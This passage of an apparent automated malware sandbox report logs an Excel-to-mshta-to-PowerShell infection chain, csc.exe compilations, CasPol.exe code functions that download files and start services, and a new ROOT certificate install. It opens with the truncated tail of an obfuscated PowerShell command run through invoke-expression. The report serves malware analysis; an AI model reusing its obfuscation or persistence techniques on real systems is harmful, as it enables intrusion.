ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,30_2_004044A4
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899C022D push eax; iretd 5_2_000007FE899C0241
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899C00BD pushad ; iretd 5_2_000007FE899C00C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044693D push ecx; ret 30_2_0044694D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044DB70 push eax; ret 30_2_0044DB84
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044DB70 push eax; ret 30_2_0044DBAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00451D54 push eax; ret 30_2_00451D61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0044B090 push eax; ret 31_2_0044B0A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0044B090 push eax; ret 31_2_0044B0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00451D34 push eax; ret 31_2_00451D41
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00444E71 push ecx; ret 31_2_00444E81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_00414060 push eax; ret 33_2_00414074
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_00414060 push eax; ret 33_2_0041409C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_00414039 push ecx; ret 33_2_00414049
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_004164EB push 0000006Ah; retf 33_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_00416553 push 0000006Ah; retf 33_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_00416555 push 0000006Ah; retf 33_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_004567E0 push eax; ret 35_2_004567FE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0045B9DD push esi; ret 35_2_0045B9E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00463EF3 push ds; retf 35_2_00463EEC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00455EAF push ecx; ret 35_2_00455EC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00433FF6 push ecx; ret 35_2_00434009

                  Persistence and Installation Behavior

                  barindex
                  Installs new ROOT certificates
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00406128 ShellExecuteW,URLDownloadToFileW,35_2_00406128
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,35_2_00419BC4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,31_2_004047CB
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
